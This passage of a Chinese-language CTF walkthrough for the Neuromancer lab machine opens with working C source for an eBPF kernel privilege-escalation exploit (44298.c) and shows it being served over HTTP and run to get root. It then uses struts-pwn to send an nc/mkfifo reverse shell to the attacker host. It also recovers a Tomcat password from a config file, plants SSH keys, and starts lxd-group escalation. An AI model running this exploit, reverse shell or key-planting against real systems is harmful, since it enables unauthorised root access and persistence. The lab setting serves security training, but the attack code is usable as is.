                "\x79\x73\x00\x00\x00\x00\x00\x00"
                "\x7b\x32\x00\x00\x00\x00\x00\x00"
                "\x95\x00\x00\x00\x00\x00\x00\x00"
                "\x55\x06\x02\x00\x01\x00\x00\x00"
                "\x7b\xa2\x00\x00\x00\x00\x00\x00"
                "\x95\x00\x00\x00\x00\x00\x00\x00"
                "\x7b\x87\x00\x00\x00\x00\x00\x00"
                "\x95\x00\x00\x00\x00\x00\x00\x00";

char bpf_log_buf[LOG_BUF_SIZE];

static int bpf_prog_load(enum bpf_prog_type prog_type,
                  const struct bpf_insn *insns, int prog_len,
                  const char *license, int kern_version) {
        union bpf_attr attr = {
                .prog_type = prog_type,
                .insns = (__u64)insns,
                .insn_cnt = prog_len / sizeof(struct bpf_insn),
                .license = (__u64)license,
                .log_buf = (__u64)bpf_log_buf,
                .log_size = LOG_BUF_SIZE,
                .log_level = 1,
        };

        attr.kern_version = kern_version;

        bpf_log_buf[0] = 0;

        return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
                   int max_entries) {
        union bpf_attr attr = {
                .map_type = map_type,
                .key_size = key_size,
                .value_size = value_size,
                .max_entries = max_entries
        };

        return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, uint64_t value) {
        union bpf_attr attr = {
                .map_fd = mapfd,
                .key = (__u64)&key,
                .value = (__u64)&value,
                .flags = 0,
        };

        return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
        union bpf_attr attr = {
                .map_fd = mapfd,
                .key = (__u64)key,
                .value = (__u64)value,
        };

        return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
        fprintf(stderr, "error: %s\n", err);
        exit(-1);
}

static void prep(void) {
        mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
        if (mapfd < 0)
                __exit(strerror(errno));

        progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
                        (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

        if (progfd < 0)
                __exit(strerror(errno));

        if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
                __exit(strerror(errno));

        if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
                __exit(strerror(errno));
}

static void writemsg(void) {
        char buffer[64];

        ssize_t n = write(sockets[0], buffer, sizeof(buffer));

        if (n < 0) {
                perror("write");
                return;
        }
        if (n != sizeof(buffer))
                fprintf(stderr, "short write: %lu\n", n);
}

#define __update_elem(a, b, c) \
        bpf_update_elem(0, (a)); \
        bpf_update_elem(1, (b)); \
        bpf_update_elem(2, (c)); \
        writemsg();

static uint64_t get_value(int key) {
        uint64_t value;

        if (bpf_lookup_elem(&key, &value))
                __exit(strerror(errno));

        return value;
}

static uint64_t __get_fp(void) {
        __update_elem(1, 0, 0);

        return get_value(2);
}

static uint64_t __read(uint64_t addr) {
        __update_elem(0, addr, 0);

        return get_value(2);
}

static void __write(uint64_t addr, uint64_t val) {
        __update_elem(2, addr, val);
}

static uint64_t get_sp(uint64_t addr) {
        return addr & ~(0x4000 - 1);
}

static void pwn(void) {
        uint64_t fp, sp, task_struct, credptr, uidptr;

        fp = __get_fp();
        if (fp < PHYS_OFFSET)
                __exit("bogus fp");

        sp = get_sp(fp);
        if (sp < PHYS_OFFSET)
                __exit("bogus sp");

        task_struct = __read(sp);

        if (task_struct < PHYS_OFFSET)
                __exit("bogus task ptr");

        printf("task_struct = %lx\n", task_struct);

        credptr = __read(task_struct + CRED_OFFSET); // cred

        if (credptr < PHYS_OFFSET)
                __exit("bogus cred ptr");

        uidptr = credptr + UID_OFFSET; // uid
        if (uidptr < PHYS_OFFSET)
                __exit("bogus uid ptr");

        printf("uidptr = %lx\n", uidptr);
        __write(uidptr, 0); // set both uid and gid to 0

        if (getuid() == 0) {
                printf("spawning root shell\n");
                system("/bin/bash");
                exit(0);
        }

        __exit("not vulnerable?");
}

int main(int argc, char **argv) {
        prep();
        pwn();

        return 0;
}

使用下面的sed命令将c源文件的格式和缩进转换一下，以更好地编译exp

root@kali:~# sed -i -e 's/\r$//' 44298.c

然后编译

root@kali:~# gcc 44298.c -o 44298

最后下载到目标机上，赋予权限之后运行exp程序

root@kali:~# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...

lady3jane@neuromancer:~$ wget http://192.168.56.102:8000/44298
--2020-01-15 23:44:14--  http://192.168.56.102:8000/44298
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17888 (17K) [application/octet-stream]
Saving to: ‘44298’

44298                              100%[=============================================================>]  17.47K  --.-KB/s    in 0s      

2020-01-15 23:44:14 (482 MB/s) - ‘44298’ saved [17888/17888]

lady3jane@neuromancer:~$ chmod 777 *
lady3jane@neuromancer:~$ ./44298
task_struct = ffff88003cc93800
uidptr = ffff88003579fd84
spawning root shell
root@neuromancer:~# id
uid=0(root) gid=0(root) groups=0(root),1001(lady3jane)
root@neuromancer:~# whoami
root

成功获取root权限，下面寻找flag

root@neuromancer:~# cd /root
root@neuromancer:/root# ls
flag.txt  struts2  velocity.log
root@neuromancer:/root# cat flag.txt 
be3306f431dae5ebc93eebb291f4914a

不要太帅。。。

做一些成功利用后的枚举，发现确实有一个crontab配置为root来执行lady3jane的主目录中的文件。

root@neuromancer:/root# crontab -l
# Edit this file to introduce tasks to be run by cron.                                                                                   
#                                                                                                                                        
# Each task to run has to be defined through a single line                                                                               
# indicating with different fields when the task will be run                                                                             
# and what command to run for the task                                                                                                   
#                                                                                                                                        
# To define the time you can provide concrete values for                                                                                 
# minute (m), hour (h), day of month (dom), month (mon),                                                                                 
# and day of week (dow) or use '*' in these fields (for 'any').#                                                                         
# Notice that tasks will be started based on the cron's system                                                                           
# daemon's notion of time and timezones.                                                                                                 
#                                                                                                                                        
# Output of the crontab jobs (including errors) is sent through                                                                          
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command

*/3 * * * * /bin/bash /home/lady3jane/server-check.sh

提权2

前面的通过Wintermute-Straylight这台虚拟机来探测内网主机的步骤省略

反弹shell

root@kali:~/struts-pwn# python struts-pwn.py -u http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 6666 >/tmp/f"

[*] URL: http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action
[*] CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 6666 >/tmp/f
EXCEPTION::::--> HTTPConnectionPool(host='192.168.56.110', port=8080): Read timed out. (read timeout=3)
ERROR
[%] Done.

root@kali:~# nc -lvp 6666
listening on [any] 6666 ...
192.168.56.110: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.110] 53960
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(ta) gid=1000(ta) groups=1000(ta),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ whoami

我们可以看到“ta”似乎是管理员，但如果没有TTY会话，它将毫无用处：

$ groups
ta adm cdrom dip plugdev lxd lpadmin sambashare

由于我们不在TTY终端中，因此看不到sudo -l的输出：

$ sudo -l
sudo: no tty present and no askpass program specified

让我们看看是否已安装python，以便我们可以执行“pty”技巧Spawning a TTY Shell:

$ which python
$ 

不 …。不在那里。如果有admin privs，可以安装它。所以在这里对我们没有太大用处：

步骤1：需要适当的TTY会话

没有适当的TTY session，将无法真正取得很大成就。有两种选择

• 使用socat将reverse shell发送回Kali。Socat为此非常方便。请参阅本文前面的链接
• 可以使用ta帐户通过SSH进入邮箱吗？没有密码，但是也许可以生成一组ssh密钥。插入box中的能力取决于打开的端口（在34483上是…，并且已经有正确的端口转发功能）。另外，在/etc/passwd中为该帐户定义了什么？它需要包括某种shell程序设置。
• 寻找其他东西。在检查/etc/passwd以确定存在哪种类型的“ta”shell时，引用了：

lady3jane:x:1001:1001:3Jane,,,:/home/lady3jane:/bin/bash

root后，已经在“Straylight”中的“note.txt”文件中看到了前面提到的内容。所以……也许那个盒子上的信条四处张望。想到这一点，介意在包装盒上其他地方也找到一些“ ta”的登录凭证。一个可能的查询行是Tomcat…它在xml文件中指定用户，该文件用于管理Tomcat工具。

让我们先尝试后一种方法。

步骤2：获得TTY-重用的证书选项

Tomcat用户是在tomcat-users.xml中定义的，因此查看这个文件：

$ cat /usr/local/tomcat/conf/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
Eng.,

Tomcat is still using basic auth. I encoded the password so the AI's security scans don't flag it.

Is this what Bob keeps talking about, "Security by obscurity?"

Ed Occam//Sys.Engineer I//Night City
"Harry, I took care of it" - Llyod Christmas
-->

  <role rolename="manager-gui"/>
  <user username="Lady3Jane" password="&gt;&#33;&#88;&#120;&#51;&#74;&#97;&#110;&#101;&#120;&#88;&#33;&lt;" roles="manager-gui"/>

<!--
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
</tomcat-users>

因此看来密码已被编码。将其纳入Burp，并在解码（HTML）时得到：

>!Xx3JanexX!<

lady3jane/>!Xx3JanexX!<

ssh连接neuromancer：

root@kali:~# ssh -p 34483 lady3jane@192.168.56.110
 ----------------------------------------------------------------
|                Neuromancer Secure Remote Access                |
| UNAUTHORIZED ACCESS will be investigated by the Turing Police  |
 ----------------------------------------------------------------
lady3jane@192.168.56.110's password: 

Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

94 packages can be updated.
44 updates are security updates.


Last login: Wed Jan 15 23:19:59 2020 from 192.168.56.102
lady3jane@neuromancer:~$ 
lady3jane@neuromancer:~$ id
uid=1001(lady3jane) gid=1001(lady3jane) groups=1001(lady3jane)
lady3jane@neuromancer:~$ whoami
lady3jane
lady3jane@neuromancer:~$ dir
44298  custom-tomcat-chk.sh
lady3jane@neuromancer:~$ pwd
/home/lady3jane

但是很遗憾，它不是任何管理员，也没有任何sudo功能：

lady3jane@neuromancer:~$ sudo -l
[sudo] password for lady3jane: 
Sorry, user lady3jane may not run sudo on neuromancer.

假设“ta”帐户提到了“group”命令的某些管理功能，让我们尝试一下“ta”帐户的可能性

步骤3：获得TTY-“ta”帐户的SSH密钥路由

生成密钥集的过程非常简单：

• cd into /home/ta
• 运行ssh-keygen。遵循所有默认设置，但选择应用密码短语。密钥存储在/home/ta/.ssh中
• 将公钥添加到/home/ta/.ssh/authorized_keys文件
• 找出id_rsa和id_rsa.pub的值，然后将其复制/粘贴到我的攻击box中的相应文件中。还将chmod 400应用于每个文件，否则ssh会抱怨权限，然后完全忽略密钥，这将导致出现不需要的密码提示（我们不知道密码！）

生成密钥并将副本放入攻击box中后，即可获得访问权限：

$ whoami
ta
$ mkdir .ssh
$ ls -la
total 60
drwxr-xr-x 7 ta   ta   4096 Jan 18 20:57 .
drwxr-xr-x 4 root root 4096 Jul  1  2018 ..
-rw-rw-r-- 1 ta   ta    352 Jul  1  2018 ai-gui-guide.txt
-rw------- 1 ta   ta     54 Jul  3  2018 .bash_history
-rw-r--r-- 1 ta   ta    220 May 18  2018 .bash_logout
-rw-r--r-- 1 ta   ta   3900 May 18  2018 .bashrc
drwx------ 2 ta   ta   4096 May 18  2018 .cache
drwxrwxr-x 3 ta   ta   4096 May 18  2018 .m2
drwxrwxr-x 4 ta   ta   4096 May 18  2018 myWebApp
drwxrwxr-x 2 ta   ta   4096 May 18  2018 .oracle_jre_usage
-rw-r--r-- 1 ta   ta    655 May 18  2018 .profile
drwxr-x--- 2 ta   ta   4096 Jan 18 20:57 .ssh
-rw-r----- 1 ta   ta     82 May 18  2018 velocity.log
-rw------- 1 ta   ta   4538 Jul  1  2018 .viminfo
$ cd .ssh
$ ls
$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ta/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 123456
Enter same passphrase again: 123456
Your identification has been saved in /home/ta/.ssh/id_rsa.
Your public key has been saved in /home/ta/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:/gzcDUYz+IUYLOPtla+IXjSlx8Mmfc9cHvH0794Ptys ta@neuromancer
The key's randomart image is:
+---[RSA 2048]----+
|       ..        |
|      o .+ .     |
|     . +o *..  ..|
|      . .Oo+   .+|
|       .S.@..  .+|
|       +.B =.+ oo|
|       .=.... = +|
|      ...+.  E +o|
|     ..   o   .+B|
+----[SHA256]-----+
$ ls -la
total 16
drwxr-x--- 2 ta ta 4096 Jan 18 21:00 .
drwxr-xr-x 7 ta ta 4096 Jan 18 20:57 ..
-rw------- 1 ta ta 1766 Jan 18 21:00 id_rsa
-rw-r----- 1 ta ta  396 Jan 18 21:00 id_rsa.pub
$ cp id_rsa.pub authorized_keys
$ ls 
authorized_keys
id_rsa
id_rsa.pub
$ chmod 400 *
$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpcLl+QjOHvGDqQ9ZPsgT8Rm9VbuZsa0JtUsE59C5feBNUC0uuOME6JSSY+Ci5fXnanOJIFKcNbRnfz0eQ35/FlCQE6TqXW08LROeaz+scppXs9O7wMNkmVrtrjHMIfebEtB9I05DWPpme5GjHE9QerNjE4t8Z6khoqipeQAy2VqYmqU5u8ll2gm3VDNhgUnfGeBwUoQA2Ktj1F9XMaBVgRBytZ86VLW1Be4SLd6rkMhgA/poZQSZGjU1di09Y9VnN/au+PgQQvVvldP2WITAfS4j0rTTF9zz8o+kccWll/CkMjoOBAJB06KBqxg1dnGcMXyEUnTshFidXx2TjBQQx ta@neuromancer
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpcLl+QjOHvGDqQ9ZPsgT8Rm9VbuZsa0JtUsE59C5feBNUC0uuOME6JSSY+Ci5fXnanOJIFKcNbRnfz0eQ35/FlCQE6TqXW08LROeaz+scppXs9O7wMNkmVrtrjHMIfebEtB9I05DWPpme5GjHE9QerNjE4t8Z6khoqipeQAy2VqYmqU5u8ll2gm3VDNhgUnfGeBwUoQA2Ktj1F9XMaBVgRBytZ86VLW1Be4SLd6rkMhgA/poZQSZGjU1di09Y9VnN/au+PgQQvVvldP2WITAfS4j0rTTF9zz8o+kccWll/CkMjoOBAJB06KBqxg1dnGcMXyEUnTshFidXx2TjBQQx ta@neuromancer
$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0A0CA4D74B1C05FCDEC9F8FAE18EFB6D

w38r/TLFNRXJBCI/BpIUgQcmqZ8tcIyIaOg5gOhBLoKgLhmQ1ghMtBghR/Uu3hY8
16Wk4Vk64miWibaNYG4aVz0XOK4Zi6u3slp8KHMZm5OARsnLRfWdBck/VSzqmv0z
uI1yl0E3jJyfA+Xlxra9lxKzSi5g4Qw64q22tJzC9bNktAbVCNaV795K7m0TJaXl
5SzB6+jagE96PjwT169VyJxX0IpVHIEeVZfkO3QD9e2mcJLgassz3fG+YlU6vQVV
O4IZnXu/pPjYSFeLyVwcasHsgWsxqRsPne7J88l8gBVFswFjLVnCLW55i14le1bk
82/BHH+3Y6zAkjueFA4/ggFKKU0kRlXQXdFMNhxH9gc3+gANeIK+qXfypx2+3keC
d6wplIaFtzt9npQh3vJnXPF4l6dWCOYAK8FqoGgcbB8qDOz5/j1qxHHo3P8mWyVP
X0wK7UzwBg8nIe3JjKtFPfSpgiNtNGai5GCvJlt7c9Wtxd1HcIFcUrCDeAb9ijMm
zzTLNdkae/677ErzfQfEeA24u21DyQoIP0MUM0ICa3Qjr5uXa1RnNq38pYfi338X
kKwHqJQCxm43HLoQIoMQIRYTN49W3wLMdnH7oF40nT6ktJuC9zlzilV+JxcRODgc
eUFoKag5y2/wR8yeLeUiDgxUzL441ThkYGa2jaULRoVehDgAUXrQEEkzY/OM8/G1
50MJAMEKJU17TDjTtjIy6ymtKPTxohezKvBwjgQmR6eGin32i6iIs38jag8jqape
0MIRzOO3gfod8FXaJMp282gebGhLwWeowjogzfyKQzwIQxkldVVOO1caJWuBczNd
JMKT7F1zoClpEg9YFyPMnkQtoNwjuGs6KtFgpt5yz/8j5jy0uiSaiLlvrOYtDDli
0AEjTlDPbzEQgKhdjdwiPm0ClJoXHIgg35mjwTwfxmFvNL2XJlunm2fDcooDbM3o
2KIzsa5kFEFbvPkP1Cym4RrTRkXv55XfRZHBk5/DBICmez6pkaC1A+W0vfyTX70z
wJrvoUHdENdQIHESb8hrAmqZXjSNsBB1WEKHcN39v/iufxMMk0Dei2Ca5VgTfyfB
lwtrdtV3YPhNT4v+2FhibKIaILIVS0oWU9IAzAHNPMt+GFXo3QRtFJmprJc8AVzf
3guFhYesZZVmzNRDcuhZuQmY54YaCc0VFEBLwoaIn5Y33zPO274IICw0IXzm4Nmm
QttHWLl9IcbVVOkkmnuvNcKZ8kdcZ24zZGXD+2bV/+VQHFanSXjEDdzeYDUjRiiK
va7jEa8wb5/mHOJFRTeYBiuLY1H239HedvycPRfHyA1Hq3q3+7c1JJVxiVdOr3zO
gM22fIaExHxjRdf0L06sht1SC9Le4d6oc5mhFjmk4h+DyorOyWuaC8xBUatE+slF
OxerKC2CdDFCrx9+8jQmix0KSfePhYC4loiQ+tS6Bp8YtiOGOmlZ+2sCa0wf7inN
sOLukUtHENuU720fPxEurnbCDG4QKk4Szvea61UkOrEF15x0PO42YSCz7QtHdLeG
hiHhVK28l9FeRekPEdOUou1tjiiVvEUUNi99YJsOroTNfiHy6RjmcA+BWFOIfHrY
-----END RSA PRIVATE KEY-----

kali端运行

root@kali:~# cd .ssh
root@kali:~/.ssh# ls
known_hosts
root@kali:~/.ssh# touch id_rsa
root@kali:~/.ssh# nano id_rsa (将ta用户中的id_rsa中的值拷贝进来)
root@kali:~/.ssh# chmod 400 *

ssh连接，输入密码123456

root@kali:~# ssh -i /root/.ssh/id_rsa -p 34483 ta@192.168.56.110
 ----------------------------------------------------------------
|                Neuromancer Secure Remote Access                |
| UNAUTHORIZED ACCESS will be investigated by the Turing Police  |
 ----------------------------------------------------------------
Enter passphrase for key '/root/.ssh/id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

94 packages can be updated.
44 updates are security updates.


Last login: Tue Jul  3 21:53:25 2018
ta@neuromancer:~$ id
uid=1000(ta) gid=1000(ta) groups=1000(ta),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
ta@neuromancer:~$ whoami
ta

it works!!!!!!

再次执行“groups”命令，然后一分钱掉了……。“ta”不是“admin”组的成员，因此不会成为root用户的即时路径：

ta@neuromancer:~$ groups
ta adm cdrom dip plugdev lxd lpadmin sambashare

向前迈进…现在没有真正的意义跳到通过socat选项获得TTY…

当试图root时，通常如下进行：

• sudo
• password
• file permissions (suid/guid)
• cron作业（通常与错误的文件权限结合使用）
• 内核漏洞
• 正在运行的应用程序
• 文件系统

通常，将该列表下移得越远，privesc就越困难。因此，……在用完前两个选项之后，需要进行一些老式枚举。
经过一系列的提权的枚举之后，发现了提权1步骤中的提权的exp，44298.c，，，但是……总会有一个“but”！:-)

步骤4：选择提权利用途径

有许多出色的可用于此计算机的编写，并且毫无例外，它们都采用内核利用选项，因为很正确的选择是最明显的选择。如果需要在检查场景中快速root箱子，那么当然会选择最明显的路线。

除了必须在攻击盒上编译漏洞利用程序（Neuromancer未安装gcc）外，这是一个非常快捷简便的选择。但是抛开任何与CTF/OSCP相关的内容……。在“现实世界”中，可以用来处理关键任务的生产系统呢？内核漏洞可能会使生产箱失效，而根本就不想危及下一步入侵！

但是，还有另一种方法可以使此box成为root，我不禁感到“杂技演员”（机器作者）可能希望将其作为另一种待发现的选择。尽管它可能会吸引蓝团队的注意，但它不太可能引起内核崩溃。那我在说什么呢？可以在以下简单命令中找到线索，以检查“ta”所属的组：

ta@neuromancer:~$ groups
ta adm cdrom dip plugdev lxd lpadmin sambashare

看到是对lxd的引用,这是Ubunutu的容器技术-Docker的替代方法,我做了一些研究，发现“Booj”写的一篇很棒的文章叫做Privilege Escalation via lxd,根据本文所述，如果安装了lxd且给定用户是lxd组的成员，则它们具有与使用以下命令添加到/etc/sudoers相同的权限：

admin ALL=NOPASSWD: ALL

因此，…使用此选项非常忙。

步骤5：准备和使用容器-概述

我不会深入探讨与创建基于Ubuntu LXC的容器相关的每个小细节。这将在另一篇文章中发表，因为这是一个引人入胜的主题，值得深入探讨，而不是本文讨论的范围。

简而言之，这项工作涉及以下方面：

• 根据获取的信息，设置一个尽可能接近Neuromancer的VM。因此，那将是Ubuntu 16.04。
• 在新创建的VM上安装lxd。
• 再次创建一个容器，基于Ubuntu 16.04。我只是想让事情简单一点，就我应该做的最好的猜测。
• 将该容器导出为tarball并将其转移到我的攻击box中，然后再将其转移到Neuromancer box中。由于先前实现了SOCAT端口转发，因此可以通过scp进行传输。

为了清楚起见……在任何时候，都没有允许攻击box位于与Neuromancer相同的物理子网中作弊。所有这些都必须以“艰苦”的方式完成。我应该怎么学？

• 导入lxd容器映像tarball并使其能够安装主机文件系统（是的，Neuromancer！）
• 在新创建的容器上获得root bash会话并创建一组SSH密钥，这些密钥将被写入Neuromancer上的/root/.ssh（通过容器中的/mnt/root/root/.ssh），并添加公共Neuromancer主机上/root/.ssh/authorized_keys的密钥（通过容器中的/mnt/root/root/.ssh）
• 将SSH密钥的副本传输到我的攻击Kali中，然后以root用户身份登录（希望如此）。

上面的内容很雄心勃勃，但是值得这么做，特别是如果唯一的选择是危险的内核漏洞利用。为了简洁，将重点放在刚刚将容器tarball转移到Neuromancer主机上的那一点上。系好安全带，享受旅程吧！:-)

步骤6-导入容器映像。

kali端攻击机运行

ta@neuromancer:~$ uname -a
Linux neuromancer 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
ta@neuromancer:~$ cat /proc/version
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

可以看出是64位的linux

root@kali:~# git clone https://github.com/saghul/lxd-alpine-builder
正克隆到 'lxd-alpine-builder'...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
展开对象中: 100% (27/27), 完成.
root@kali:~# cd lxd-alpine-builder/
root@kali:~/lxd-alpine-builder# ls
build-alpine  LICENSE  README.md
root@kali:~/lxd-alpine-builder# chmod 777 *
root@kali:~/lxd-alpine-builder# ls
build-alpine  LICENSE  README.md
root@kali:~/lxd-alpine-builder# proxychains ./build-alpine -a x86_64
ProxyChains-3.1 (http://proxychains.sf.net)
Determining the latest release... |DNS-request| dl-cdn.alpinelinux.org 
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
v3.11
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.11/main/x86_64
|DNS-request| dl-cdn.alpinelinux.org 
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
Downloading alpine-mirrors-3.5.10-r0.apk
|DNS-request| dl-cdn.alpinelinux.org 
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading alpine-keys-2.1-r2.apk
|DNS-request| dl-cdn.alpinelinux.org 
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading apk-tools-static-2.10.4-r3.apk
|DNS-request| dl-cdn.alpinelinux.org 
|D-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| dl-cdn.alpinelinux.org is 151.101.40.249
|D-chain|-<>-127.0.0.1:1080-<><>-151.101.40.249:80-<><>-OK
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: 成功
Verified OK
Selecting mirror http://dl-8.alpinelinux.org/alpine/v3.11/main
fetch http://dl-8.alpinelinux.org/alpine/v3.11/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r0)
(2/19) Installing busybox (1.31.1-r9)
Executing busybox-1.31.1-r9.post-install
(3/19) Installing alpine-baselayout (3.2.0-r3)
Executing alpine-baselayout-3.2.0-r3.pre-install
Executing alpine-baselayout-3.2.0-r3.post-install
(4/19) Installing openrc (0.42.1-r2)
Executing openrc-0.42.1-r2.post-install
(5/19) Installing alpine-conf (3.8.3-r4)
(6/19) Installing libcrypto1.1 (1.1.1d-r3)
(7/19) Installing libssl1.1 (1.1.1d-r3)
(8/19) Installing ca-certificates-cacert (20191127-r0)
(9/19) Installing libtls-standalone (2.9.1-r0)
(10/19) Installing ssl_client (1.31.1-r9)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.4-r3)
(13/19) Installing busybox-suid (1.31.1-r9)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.4-r0)
(16/19) Installing musl-utils (1.1.24-r0)
(17/19) Installing libc-utils (0.7.2-r0)
(18/19) Installing alpine-keys (2.1-r2)
(19/19) Installing alpine-base (3.11.3-r0)
Executing busybox-1.31.1-r9.trigger
OK: 8 MiB in 19 packages
root@kali:~/lxd-alpine-builder# ls
alpine-v3.11-x86_64-20200119_0151.tar.gz  build-alpine  LICENSE  README.md

将alpine-v3.11-x86_64-20200119_0151.tar.gz传输到目标机上

ta@neuromancer:/tmp$ scp root@192.168.56.102:/root/lxd-alpine-builder/alpine-v3.11-x86_64-20200119_0151.tar.gz /tmp/
root@192.168.56.102's password: 
alpine-v3.11-x86_64-20200119_0151.tar.gz                                             100% 3151KB   3.1MB/s   00:00    
ta@neuromancer:/tmp$ ls
alpine-v3.11-x86_64-20200119_0151.tar.gz
f
hsperfdata_ta
systemd-private-14b0eedfa06043179575f7374dc44c6a-systemd-timesyncd.service-EqRj97

要导入容器映像，使用以下命令：
“别名”是一种引用容器image而不是冗长的文件名的方便方法（根据lxc，它实际上是“指纹”）：

ta@neuromancer:/tmp$ lxc image import alpine-v3.11-x86_64-20200119_0151.tar.gz --alias haxor
Image imported with fingerprint: 468c747448ec99c6b76e5a943df89a21489eb5d605ebe5d4c341a78ec217a223
ta@neuromancer:/tmp$ lxc image list
